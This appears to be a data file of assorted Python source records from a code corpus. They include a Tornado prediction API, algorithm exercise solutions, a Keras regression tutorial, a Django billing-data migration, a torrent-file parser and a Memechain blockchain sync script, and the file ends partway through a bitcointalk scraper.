+{"seq_id":"26932790","text":"import tornado\n\nimport logging\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.web\n\nfrom tornado.concurrent import Future\nfrom tornado import gen\nfrom tornado.options import define, options\n\nimport os.path\nimport uuid\nimport json\nimport boto3\nimport argparse\n\nfrom models import ModelHandler\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\ndefine(\"debug\", default=True, help=\"run in debug mode\")\n\n\nclass MainHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('GET')\n\n def get(self):\n message = 'You have reached the mdf server, please make some furniture'\n self.set_status(200, reason='All the wood is good')\n self.write(message)\n\n\nclass InfoHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('GET')\n\n def initialize(self, metadata):\n self.metadata = metadata\n\n def get(self):\n self.set_status(200, reason='metadata found')\n self.write(self.metadata)\n\n\nclass PredictHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('POST')\n\n def initialize(self, model):\n self.model = model.copy()\n\n @gen.coroutine\n def post(self):\n # unpack arguments\n newdata = json.loads(self.get_body_argument)\n # make prediction\n result = yield self.model.predict(newdata)\n self.set_status(200, 'I have seen the future and the future has seen me')\n self.write(result)\n\nclass TrainHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('POST')\n\n def initialize(self, model):\n self.model = model.copy()\n\n @gen.coroutine\n def post(self):\n # unpack arguments\n # newdata = json.loads(self.get_body_argument)\n # make prediction\n result = yield self.model.train(newdata)\n self.set_status(200, 'I have seen the past and the past believes in me')\n self.write(result)\n\n\ndef main(args):\n\n options['port'] = args.port\n\n mh = ModelHandler(args.config)\n metadata = mh.info()\n mh.load(args.model)\n\n app = tornado.web.Application(\n [\n (r\"/\", MainHandler),\n (r\"/info\", InfoHandler, metadata),\n (r\"/predict\", PredictHandler, mh),\n (r\"/train\", TrainHandler, mh),\n ],\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n # template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n # static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n debug=options.debug,\n )\n app.listen(options.port)\n tornado.ioloop.IOLoop.current().start()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='medium density framwork server')\n parser.add_argument('--port', type=int, default=8888, help='port number to listen on')\n parser.add_argument('--model', type=str, default=None, help='path to a pre-trained model')\n parser.add_argument('--config', type=str, default=None, help='path to a yaml file containing metadata about the model')\n args = parser.parse_args()\n\n main(args)\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"283503142","text":"# https://leetcode.com/problems/add-two-numbers-ii/#/description\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head = l1\n l1 = node = None\n while head:\n node = head\n head = head.next\n node.next = l1\n l1 = node\n \n head = l2\n l2 = node = None\n while head:\n node = head\n head = head.next\n node.next = l2\n l2 = node\n \n carry = 0\n ptr1 = l1\n ptr2 = l2\n res = None\n while ptr1 or ptr2 or carry>0:\n sum = carry\n if ptr1:\n sum += ptr1.val\n ptr1 = ptr1.next\n if ptr2:\n sum += ptr2.val\n ptr2 = ptr2.next\n carry = int(sum / 10)\n sum = sum % 10\n node = ListNode(sum)\n node.next = res\n res = node\n \n return res\n","sub_path":"add-two-numbers-ii.py","file_name":"add-two-numbers-ii.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"363929739","text":"# r2=회귀지수 / max값은 1\n# 선형회귀에서 accuracy 대신 많이 씀\n\nimport numpy as np\n\n#1. 데이터\nx_train=np.array([1,2,3,4,5,6,7,8,9,10]) #훈련 시킬 데이터\ny_train=np.array([1,2,3,4,5,6,7,8,9,10]) #훈련 시킬 데이터\nx_test=np.array([11,12,13,14,15]) #평가 할 데이터 : 훈련 데이터에 영향을 미쳐선 안됨\ny_test=np.array([11,12,13,14,15]) #평가 할 데이터\nx_pred=np.array([16,17,18]) #예측값을 낼 데이터\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\n#2. 모델 구성\nmodel=Sequential()\nmodel.add(Dense(300, input_dim=1)) \nmodel.add(Dense(700)) \nmodel.add(Dense(1000))\nmodel.add(Dense(1))\n\n#3. 컴파일, 훈련\nmodel.compile(loss='mse', optimizer='adam', metrics=['mae']) \nmodel.fit(x_train, y_train, epochs=100, batch_size=1) \n\n\n#4. 평가, 예측\nloss=model.evaluate(x_test, y_test, batch_size=1)\nprint(\"loss : \", loss)\n#print(\"acc : \", acc)\n\ny_predict=model.predict(x_test)\nprint('예측 결과물 : \\n',y_predict)\n\n\n# RMSE (mse에 제곱근 씌운 값) : 사용자 정의\nfrom sklearn.metrics import mean_squared_error\n\ndef RMSE(y_test, y_predict) :\n return np.sqrt(mean_squared_error(y_test, y_predict))\n\nprint(\"RMSE : \", RMSE(y_test, y_predict))\n\n\n# R2 : accuracy 대신 회귀모델에서 쓰지만 백프로 신뢰할 수는 없어 RMSE와 함께 씀 \nfrom sklearn.metrics import r2_score \n\nr2=r2_score(y_test, y_predict)\nprint(\"R2 : \", r2)","sub_path":"Study/keras/keras07_r2.py","file_name":"keras07_r2.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309426432","text":"\n\ndef solution(N, P, Q):\n answer = list()\n if N == 1:\n for idx in range(len(P)):\n answer.append(0)\n return answer\n primes = sieves(N)\n semiPrimesList = semiPrimes(primes, N)\n prefSumArr = prefixSum(semiPrimesList)\n for idx, values in enumerate(P):\n answer.append(prefSumArr[Q[idx]] - prefSumArr[values-1])\n return answer\n\n#construct array of primes up to N/2\ndef sieves(N):\n sieve = [True] * ((N+2)//2)\n sieve[0] = sieve[1] = False\n i = 2\n while (i * i <= ((N+1)//2)):\n if(sieve[i]):\n k = i*i\n while(k<=((N+1)//2)):\n sieve[k] = False\n k += i\n i +=1\n return sieve\n\n#construct array of semiprimes up to N\ndef semiPrimes(sieve, N):\n semiPrimes = [0] * (N+1)\n i = 2\n while(i*i <= N):\n if(sieve[i]):\n secondMultiplicator = i\n while(secondMultiplicator <= N//2 and i * secondMultiplicator <= N):\n if(sieve[secondMultiplicator]):\n semiPrimes[secondMultiplicator * i] = True\n secondMultiplicator += 1\n else:\n secondMultiplicator +=1\n i += 1\n return semiPrimes\n\n#create a prefixsum array of semiprimes up to N\ndef prefixSum(semiPrimesList):\n lenSemis = (len(semiPrimesList))\n prefixSumArray = [0] * lenSemis\n for i in range(lenSemis):\n if(semiPrimesList[i]):\n prefixSumArray[i] = prefixSumArray[i-1] + 1\n else:\n prefixSumArray[i] = prefixSumArray[i-1]\n return prefixSumArray","sub_path":"Lesson 11/CountSemiPrimes.py","file_name":"CountSemiPrimes.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"5378561","text":"from dependencies_graph.evaluation.spans_dependencies_to_logical_form_tokens import SpansDepToQDMRStepTokensConverter\nfrom dependencies_graph.extractors import *\n\n\n###################\n# spans_extractor #\n###################\nspans_extractor = FromFileSpansExtractor('datasets/Break/QDMR/train_spans.json',\n 'datasets/Break/QDMR/dev_spans.json')\n\n\n#################################\n# tokens_dependencies_extractor #\n#################################\n# steps_dependencies_extractor = PatternBasedStepsDependenciesExtractor()\nsteps_dependencies_extractor = LogicalFormBasedStepsDependenciesExtractor()\nspans_dependencies_extractor = MergeSpansDependenciesExtractor(spans_extractor, steps_dependencies_extractor)\nspans_dependencies_collapsers = [\n # make sure steps ids are sequential (in cases of removed nodes)\n ToSequentialIdsCollapser(),\n # make sure we backed to proper dependencies type on unwind\n ToDependencyTypeCollapser(),\n\n MissingResourcesCollapser(),\n # LastStepCollapser(create_separate_span=True),\n\n # single to dup\n # PreSingleToMultipleStepsCollapser(), # works only with NotAlignedCollapser\n DupSingleToMultipleStepsCollapser(count=5),\n\n # JoinCollapser(),\n # ConcatCollapser(),\n NotAlignedDumCollapser(count=5),\n\n AddOperatorsPropertiesCollapser(),\n]\ntokens_dependencies_extractor = TokensDependenciesExtractor(spans_dependencies_extractor, spans_dependencies_collapsers)\n\n###############################\n# tokens dependencies to QDMR #\n###############################\nspans_to_qdmr_converter = RuleBasedSpansDepToQdmrConverter()\ntokens_dependencies_to_qdmr_extractor = SpansBasedTokensDependenciesToQDMRExtractor(spans_to_qdmr_converter,\n tokens_dependencies_extractor)\n\n\n########\n# Eval #\n########\nspans_dependencies_to_logical_form_converter = SpansDepToQDMRStepTokensConverter(infer_properties=False)","sub_path":"dependencies_graph/config/config_default.py","file_name":"config_default.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"614652179","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\nimport json\nimport logging\nimport MySQLdb as mdb\n\nfrom django.conf import settings\nfrom django.core.management.base import NoArgsCommand\n\nfrom billing_proxy.api import keystone\nfrom billing_proxy import models\n\nLOG = logging.getLogger(__name__)\n\nCACHE_KEY_PRODUCTS = \"products\"\n\n\ndef product_item_modify_floatingip(product_item):\n [product_item.remove(item) for item in product_item\n if item[\"name\"] == \"ipAddress\"]\n\n\ndef get_parent_user(username):\n user_list = keystone.list_user(username=username)\n for user in user_list:\n if getattr(user, 'parent_user_id', None):\n try:\n parent_user = keystone.user_get(user.parent_user_id)\n return parent_user.name\n except Exception:\n return False\n else:\n return username\n else:\n return False\n\n\ndef update_parent_user_name(brobj):\n parent_user_name = get_parent_user(brobj.user_name)\n if parent_user_name:\n LOG.info(\"Updating user {0} ,\"\n \"parent user user: {1}\".format(brobj.user_name,\n parent_user_name))\n brobj.parent_user_name = parent_user_name\n return True\n else:\n return False\n\n\ndef update_billing_resource_parent_user(mig):\n rows = models.BillingResources.objects.filter(\n **{\"resource_id\": mig.resource_id, \"parent_user_name__isnull\":\n True})\n for row in rows:\n if update_parent_user_name(row):\n row.save()\n\n\ndef update_billing_resources(mig):\n BillingResources = models.BillingResources\n LOG.info(\"updating BillingResources %s\" % mig.resource_id)\n\n product_item = json.loads(\"[\" + str(mig.product_item) + \"]\")\n formated_product_item = [dict(map(lambda x: (str(x), str(item[x])), item))\n for item in product_item]\n\n if mig.BACK_RESOURCE_CODE == \"fixedBandwidth\":\n product_item_modify_floatingip(formated_product_item)\n update_spec = {\"contract_id\": mig.contract_id,\n \"product_name\": mig.BACK_RESOURCE_CODE,\n \"product_item\": json.dumps(formated_product_item)}\n if mig.cycle:\n if mig.cycle == \"C0Y\":\n period = \"year\"\n update_spec.update({\"period\": period})\n elif mig.cycle == \"C0M\":\n period = \"month\"\n update_spec.update({\"period\": period})\n elif mig.cycle == \"C0D\":\n period = \"day\"\n update_spec.update({\"period\": period})\n elif mig.cycle == \"C0H\":\n period = \"hour\"\n update_spec.update({\"period\": period})\n\n BillingResources.objects.select_for_update().filter(\n **{\"resource_id\": mig.resource_id}).update(\n **update_spec)\n\n\ndef update_billing_resource_order(mig):\n BillingResourceOrder = models.BillingResOrder\n LOG.info(\"updating BillingResourceOrder %s\" % mig.resource_id)\n row_nums = BillingResourceOrder.objects.select_for_update().filter(\n **{\"resource_id\": mig.resource_id}).update(\n **{\"contract_id\": mig.contract_id})\n\n if str(row_nums) == \"0\":\n try:\n res_obj = models.BillingResources.objects.get(\n resource_id=mig.resource_id)\n except Exception:\n LOG.info(\"resource %s not existed in bill_res\" % mig.resource_id)\n return\n if mig.order_state == \"OSD\":\n return\n BillingResourceOrder(contract_id=mig.contract_id,\n resource_type=mig.BACK_RESOURCE_CODE,\n account=res_obj.user_name,\n resource_id=mig.resource_id).save()\n\n\ndef update_billing_recycle_resources(mig):\n RecycleResources = models.RecycleResources\n LOG.info(\"updating RecycleResources %s\" % mig.resource_id)\n RecycleResources.objects.select_for_update().filter(\n **{\"resource_id\": mig.resource_id,\n \"contract_id__isnull\": True}).update(\n **{\"contract_id\": mig.contract_id})\n\n\ndef load_data():\n sql = \"\"\"select contract_id, resource_id, order_id, contract_code,\n product_item,\n offer_id, BACK_RESOURCE_CODE,\n order_state, offer_name,\n cycle, create_date, idc_id from mig_order_agree_map\n \"\"\"\n cursor, connection = get_cursor(sql)\n for row in result_iter(cursor):\n mig = APIDictWrapper(row)\n update_billing_resources(mig)\n update_billing_resource_order(mig)\n update_billing_resource_parent_user(mig)\n update_billing_recycle_resources(mig)\n connection.close()\n\n\ndef result_iter(cursor):\n \"\"\"An iterator that uses fetchmany to keep memory usage down\"\"\"\n while True:\n results = cursor.fetchmany(1000)\n if not results:\n break\n for result in results:\n yield result\n\n\nclass APIDictWrapper(object):\n \"\"\"Simple wrapper for api dictionaries\n\n Some api calls return dictionaries. This class provides identical\n behavior as APIResourceWrapper, except that it will also behave as a\n dictionary, in addition to attribute accesses.\n\n \"\"\"\n\n _apidict = {} # Make sure _apidict is there even in __init__.\n\n def __init__(self, apidict):\n self._apidict = apidict\n\n def __getattribute__(self, attr):\n try:\n return object.__getattribute__(self, attr)\n except AttributeError:\n if attr not in self._apidict:\n raise\n return self._apidict[attr]\n\n def __getitem__(self, item):\n try:\n return getattr(self, item)\n except AttributeError as e:\n # caller is expecting a KeyError\n raise KeyError(e)\n\n def get(self, item, default=None):\n try:\n return getattr(self, item)\n except AttributeError:\n return default\n\n def __repr__(self):\n return \"<%s: %s>\" % (self.__class__.__name__, self._apidict)\n\n def to_dict(self):\n return self._apidict\n\n\ndef get_cursor(sql):\n try:\n connection = initialize_db()\n cursor = get_raw_data(connection, sql)\n except (AttributeError, mdb.OperationalError):\n connection = initialize_db()\n cursor = get_raw_data(connection, sql)\n return cursor, connection\n\n\ndef get_raw_data(connection, sql):\n \"\"\"get data from bss datasource\"\"\"\n\n LOG.info(\"Start executing: \" + str(\n datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")) + \"\\n\" + sql)\n cursor = connection.cursor()\n cursor.execute(sql)\n return cursor\n\n\ndef initialize_db(charsets=\"utf8\"):\n\n connection = mdb.connect(settings.DATABASES[\"default\"][\"HOST\"],\n settings.DATABASES[\"default\"][\"USER\"],\n settings.DATABASES[\"default\"][\"PASSWORD\"],\n settings.DATABASES[\"default\"][\"NAME\"],\n charset=charsets,\n cursorclass=mdb.cursors.DictCursor)\n return connection\n\n\nclass Command(NoArgsCommand):\n help = \"import bss resource_contract data into BP database\"\n\n def handle(self, **option):\n load_data()\n","sub_path":"billing_proxy/management/commands/migration_data.py","file_name":"migration_data.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"397984671","text":"\nimport re\nimport os\n\nfrom datetime import datetime\n\n# Inheriting from object creates a \"new-style\" class (post 2.1).\n# Among other things, this enables properties (example below - creation_date)\n# and descriptors.\nclass PyTorrent(object):\n \"\"\"Provide a simple interface to bencoded bittorrent files.\n\n http://www.bittorrent.org/beps/bep_0003.html\n http://wiki.theory.org/BitTorrentSpecification\n\n Keyword arguments\n * path: the path to the bittorrent file\n\n Exposed information\n * created_by: the client that created the torrent\n * creation_date: the date on which the torrent was created\n * comment: any comment included with the torrent\n \n * announce: a list of lists of trackers\n * private: 1 indicates torrent is tracked by private tracker\n\n * files: file information by file path\n * pieces: a list of 20-byte SHA1 hash values\n * piece_length: the length of each piece\n\n \"\"\"\n\n def __init__(self, path):\n self.torrent_file = path\n\n self.torrent_data = {}\n tor_file_len = os.path.getsize(self.torrent_file)\n with open(self.torrent_file, 'r') as f:\n self.parse(f.read(tor_file_len))\n\n data = self.torrent_data\n\n self.created_by = data.get(\"created by\", \"\")\n self.creation_date = data.get(\"creation date\", \"\")\n self.comment = data.get(\"comment\", \"\")\n \n # For convenience, create same data structure (list of lists)\n # for both announce and announce-list\n self.announce = data.get(\"announce-list\", [[data['announce']]])\n\n self.files = {}\n self.generateFileList()\n\n info = data['info']\n pieces = bytearray(info['pieces'])\n self.pieces = [ pieces[i:i+20] for i in range(0, len(pieces), 20) ]\n self.piece_length = info['piece length']\n self.private = info.get(\"private\", 0)\n self.name = info['name']\n\n self.creation_date = property(self.getDate, self.setDate, doc=\"The date this torrent was created.\")\n\n def getDate(self):\n return self._creation_date.strftime(\"%a. %b. %d, %Y %H:%M\")\n\n def setDate(self, value):\n self._creation_date = datetime.fromtimestamp(value)\n\n def __del__(self):\n pass\n\n def __str__(self):\n return (\"File: {filename}\\n\"\n \"Name: {name}\\n\"\n \"Date: {date}\\n\"\n \"Client: {client}\\n\"\n \"Tracker(s){private}: {tracker}\\n\"\n \"Comment: {comment}\\n\").format(\n filename=self.torrent_file,\n name=self.name,\n client=self.created_by,\n date=self.creation_date,\n tracker=self.announce,\n private=(\" (private)\" if self.private else \"\"),\n comment=self.comment)\n\n def generateFileList(self):\n \"\"\"Populates the files member.\n The idea here is to provide identical data structures regardless\n of whether this torrent is single or multiple file.\n \"\"\"\n info = self.torrent_data['info']\n name = info['name']\n if \"files\" in info:\n # Prepend \"name\" (of directory) to file path\n self.files = dict((\"{0}/{1}\".format(name, '/'.join(f['path'])), f)\n for f in info['files'])\n else:\n # Ok, I know what you're thinking. This is kinda bad. I did it\n # just for fun. Two things: 1) I wanted to conditionally add the\n # \"md5sum\" key, hence the comprehension. 2) In order to match the\n # multiple file structure above, the \"name\" key had to change to\n # \"path\".\n self.files = { name:\n dict(((key if key != \"name\" else \"path\"), info[key])\n for key in (\"name\", \"length\", \"md5sum\")\n if key in info) }\n\n # Providing the regex as a default parameter argument keeps it from being\n # recompiled on recursive calls.\n def parse(self, string, i=0, reg=re.compile(\"([idle])|(\\d+):|(-?\\d+)\")):\n \"\"\"Populate the torrent_data member by recursively parsing an arbitrarily\n complex bencoded structure.\n \"\"\"\n result = []\n while i < len(string):\n match = reg.match(string, i)\n m_str = match.group(match.lastindex)\n i = match.end()\n if match.lastindex == 1:\n if m_str in (\"d\", \"l\"):\n i, r = self.parse(string, i, reg)\n if m_str == \"d\":\n r = dict(zip(r[0::2], r[1::2]))\n result.append(r)\n elif m_str == \"e\":\n return (i, result)\n elif match.lastindex == 2:\n result.append(string[i:i + int(m_str)])\n i += int(m_str)\n else:\n result.append(int(m_str))\n i += 1\n\n self.torrent_data = result[0]\n\n\n__all__ = ['PyTorrent']\n\n","sub_path":"pytorrent.py","file_name":"pytorrent.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264957511","text":"from logger import *\nimport os\nimport json\nimport pickle as pickle\nimport time\nfrom lib.db import MemeChainDB\nfrom lib.blockchain import *\nfrom lib.memechain import MemeTx, Validate\nfrom lib.ipfs import IPFSTools\nimport psutil\n\n# Load configuration file\nwith open(\"config.json\", \"r\") as f:\n config = json.loads(f.read())\n\nclass GenesisMeme(MemeTx):\n def __init__(self):\n # Genesis Meme Constants\n self.genesis_ipfs_id = 'QmUNCRjfvVts5kdxNJTQvTABE8AKPUFDyYsjqefFj2bEbG'\n self.genesis_kekcoin_block = 947594\n self.genesis_txid = '36ee54a262ee65ca54e41baf1298cc7f6aa1f3c6a29fb79c4ab75582ee6ec9af'\n self.genesis_author = 'KVsKHQbuoKUgHNaFm4jZKZVHDAKPPCvwbr'\n self.genesis_img_format = 'jpg'\n\n self.ipfs_id = self.genesis_ipfs_id\n self.generate_genesis_hashlink()\n\nclass MemechainParser(object):\n \"\"\"\n Wrapper class for various blockchain parsing functions\n used to construct the local memechain metadata database\n \"\"\"\n\n def __init__(self, block_height):\n self.block_height = block_height\n self.memetxs = []\n\n def collect_memetxs(self):\n \"\"\"\n Method used to parse the op_return data\n for the transactions in the block\n \"\"\"\n block_txs = get_block_txs(self.block_height)\n\n for txid in block_txs:\n memetx, author = get_op_return_data(txid)\n \n if memetx:\n self.parse_memetx(memetx, txid, author)\n\n def parse_memetx(self, memetx, txid, author):\n \"\"\"\n Method used to parse the raw memetx metadata\n \"\"\"\n # Identifier\n if memetx[:4] == '3ae4':\n # Command bytes\n if memetx[4:6] =='00':\n\n ipfs_id = memetx[6:][:len(memetx) - 6 - 16]\n hashlink = memetx[6:][len(memetx) - 6 - 16:]\n\n self.memetxs.append({\n 'ipfs_id': ipfs_id,\n 'hashlink': hashlink,\n 'txid' : txid,\n 'author' : author\n })\n\n def return_memetxs(self):\n \"\"\"\n Method used to return the potentially valid memetxs\n\n Returns:\n Memetxs at block_height (array)\n \"\"\"\n return self.memetxs\n\ndef sync_block(db, block):\n parser = MemechainParser(block)\n parser.collect_memetxs()\n memetxs = parser.return_memetxs()\n\n if memetxs:\n prev_block_memes = db.get_prev_block_memes()\n\n for meme in memetxs:\n memetx = MemeTx(meme['ipfs_id'])\n memetx.generate_hashlink(prev_block_memes)\n memetx.txid = meme['txid']\n Validate(memetx, db=db, ipfs_dir=config['DATA_DIR'],\n prev_block_memes=prev_block_memes, sync=True)\n valid_state = memetx.is_meme_valid()\n if valid_state == -1:\n meme_filepath = IPFSTools().get_meme(meme['ipfs_id'], config['DATA_DIR'])\n ext = meme_filepath.split(\".\")[-1]\n\n if db.search_by_ipfs_id(meme['ipfs_id']):\n db.update_meme(meme['ipfs_id'], block)\n logger.info('COMMAND %s Success %s: %s' % (\n 'Sync', 'Memechain', \"Meme %s update in database.\" % meme['ipfs_id']))\n else:\n db.add_meme(**{\"ipfs_id\": meme['ipfs_id'], \"hashlink\": meme['hashlink'],\n \"txid\": meme['txid'], \"author\": meme['author'], \"block\": block, \"imgformat\": ext, \"status\": \"confirm\"})\n logger.info('COMMAND %s Success %s: %s' % ('Sync', 'Memechain', \"Meme %s added to database.\" % meme['ipfs_id']))\n elif valid_state != 3:\n meme_filepath = IPFSTools().get_meme(meme['ipfs_id'], config['DATA_DIR'])\n os.remove(meme_filepath)\n logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Invalid MemeTx %s.\" % meme['ipfs_id'])) \n\n else:\n if config[\"ENABLE_LOG_MEMTX_NOT_FOUND\"]:\n logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"No Meme TXs found in block %s.\" % block))\n\ndef check_files_status(db):\n for file in os.listdir(config['DATA_DIR']):\n if file.endswith(tuple(config[\"ALLOWED_IMAGE_EXTENSIONS\"])):\n if db.search_by_ipfs_id(file.split(\".\")[0]) is None:\n os.remove(os.path.join(config['DATA_DIR'], file))\n logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Remove file from data folder (not exist in db) %s.\" % file))\n\n for meme in db.get_all_memes():\n if not os.path.isfile(os.path.join(config['DATA_DIR'], meme[\"ipfs_id\"] + \".\" + meme[\"imgformat\"])):\n logger.info('COMMAND %s Failed %s: %s' % (\n 'Sync', 'Memechain', \"File not found in data folder (exist in db) %s.\" % meme[\"ipfs_id\"]))\n ipfs = IPFSTools()\n ipfs.get_meme(meme[\"ipfs_id\"], config['DATA_DIR'])\n logger.info('COMMAND %s Info %s: %s' % ('Sync', 'Memechain', \"Try downloading missing file with id %s.\" % meme[\"ipfs_id\"]))\n\n\ndef check_running():\n counter = 0\n for q in psutil.process_iter():\n if q.name().find('sync'):\n if len(q.cmdline())>1 and 'sync.py' in q.cmdline()[1]:\n counter = counter + 1\n if counter > 1:\n return True\n else:\n return False\n\n\n\nif __name__ == '__main__':\n # Load database\n db = MemeChainDB(os.path.join(config['DATA_DIR'], 'memechain.json'))\n\n\n\n if not config[\"MULTIPLE_SYNC_RUNNING\"] and check_running():\n logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Sync process already running.Shutdown current sync\"))\n sys.exit(1)\n\n if config[\"CHECK_FILES_ON_RUNNING\"]:\n check_files_status(db)\n\n # Check blockheight\n block_height = get_block_height()\n \n if db.get_memechain_height() == 0:\n # Load genesis meme\n genesis_meme = GenesisMeme()\n\n memetx = MemeTx(genesis_meme.genesis_ipfs_id)\n memetx.generate_genesis_hashlink()\n memetx.txid = genesis_meme.genesis_txid\n \n Validate(memetx, db=db, ipfs_dir=config['DATA_DIR'],\n prev_block_memes=[], sync=True, genesis=True)\n # Add genesis meme to database\n\n\n db.add_meme(**{\"ipfs_id\": genesis_meme.get_ipfs_id(), \"hashlink\": genesis_meme.get_hashlink(),\n \"txid\": genesis_meme.genesis_txid, \"author\": genesis_meme.genesis_author, \"block\": genesis_meme.genesis_kekcoin_block, \"imgformat\": genesis_meme.genesis_img_format, \"status\": \"confirm\"})\n\n # Sync loop\n if genesis_meme.genesis_kekcoin_block < block_height:\n block = genesis_meme.genesis_kekcoin_block + 1\n max_errors = 0\n while block < block_height + 1:\n try:\n sync_block(db, block)\n except IOError as e:\n logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Invalid ipfs multihash.%s\") % e)\n if max_errors < 10:\n time.sleep(10)\n block = block - 1\n max_errors = max_errors + 1\n else:\n max_errors = 0\n except KeyboardInterrupt:\n # Dump current sync height into a pickle\n pickle.dump(block, open(os.path.join(config['DATA_DIR'], 'sync.p'), 'wb'))\n block = block + 1\n\n else:\n logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Blockchain Error', \"Kekcoin blockchain syncing...\"))\n\n else:\n # Load last synced height\n try:\n synced_height = pickle.load(open(os.path.join(config['DATA_DIR'], 'sync.p'), 'rb'))\n except IOError as e:\n last_meme = db.get_last_meme()\n synced_height = last_meme['block']\n\n # Sync loop\n \n if synced_height-10 < block_height:\n block = synced_height-10 + 1\n max_errors = 0\n while block < block_height + 1:\n try:\n sync_block(db, block)\n except IOError as e:\n logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Invalid ipfs multihash.%s\") % e)\n if max_errors < 10:\n time.sleep(10)\n block = block - 1\n max_errors = max_errors + 1\n else:\n max_errors = 0\n except KeyboardInterrupt:\n # Dump current sync height into a pickle\n pickle.dump(block, open(os.path.join(config['DATA_DIR'], 'sync.p'), 'wb'))\n block = block + 1\n\n # Dump current sync height into a pickle\n pickle.dump(block_height, open(os.path.join(config['DATA_DIR'], 'sync.p'), 'wb'))\n\n else:\n logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Blockchain Error', \"Kekcoin blockchain syncing...\"))\n\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":9018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"345941864","text":"# %%\nfrom fun import *\nimport matplotlib.pyplot as plt\n\nfrom __future__ import unicode_literals\nfrom matplotlib import rc\nmatplotlib.rcParams['text.usetex'] = True\nmatplotlib.rcParams['text.latex.unicode'] = True\n\ndirectory = '/home/astra/Documents/Faks/Magisterij/Paper/Slike_paper'\n\n#%%\nprimer_bulk = Chiral_bulk(10**4, 1.75, 0.25, 100., 0.1)\nsx_mat = np.load('%s/sx_mat1.npy'%directory)\nsy_mat = np.load('%s/sy_mat1.npy'%directory)\n\nt_vec = np.linspace(0., 100., int(100./0.1) + 1)\nk_vec = 2.*np.pi/10**4*np.linspace(0., 10**4-1., 10**4)\n\n#%%\ni_vec = [499, 500, 501]\n\nfig = plt.figure(figsize = (6, 6))\nfor num in range(3):\n i = i_vec[num]\n dx_vec = np.array([np.real(primer_bulk.h_mat(t_vec[i], k)[0][1]) for k in k_vec])\n dy_vec = np.array([np.imag(primer_bulk.h_mat(t_vec[i], k)[1][0]) for k in k_vec])\n dabs_vec = np.array([np.abs(primer_bulk.h_mat(t_vec[i], k)[0][1]) for k in k_vec])\n\n dotprod_vec = (sx_mat[i]*dx_vec + sy_mat[i]*dy_vec)/dabs_vec\n\n x_vec = dotprod_vec*dx_vec/dabs_vec\n y_vec = dotprod_vec*dy_vec/dabs_vec\n\n ax = fig.add_subplot(2, 2, num+1)\n ax.set_title(u'Čas $t = {}$'.format(round(i*0.1, 1)))\n ax.plot(x_vec, y_vec)\n ax.set_xlim(-1.1, 1.1)\n ax.set_aspect('equal')\nfig.tight_layout()\n\n#%%\n#fig.savefig('{}/test1_b.pdf'.format(directory))\n\n#Se za quench preko kriticne tocke in nazaj!","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482052649","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Author: billx\n@Date: 2018/9/19\n@Descript:\n\"\"\"\nimport re\n\n\ndef foo(param):\n assert re.match('^[0-9]{1,10}$', param), 'param invalid.'\n print(param)\n\n\nparam = '1237979797'\nfoo(param)\n\n\n","sub_path":"day21_assert.py","file_name":"day21_assert.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491738786","text":"\"\"\" Core scraper for bitcointalk.org. \"\"\"\nimport logging\nfrom bitcointalk import memoizer\nfrom bitcointalk import bitcointalk\n\nboardId = 14\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s:%(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n\nlogging.info(\"Beginning scrape of board ID...\".format(boardId))\nboard = memoizer.scrapeBoard(boardId)\nlogging.info(\"Found {0} topic pages in 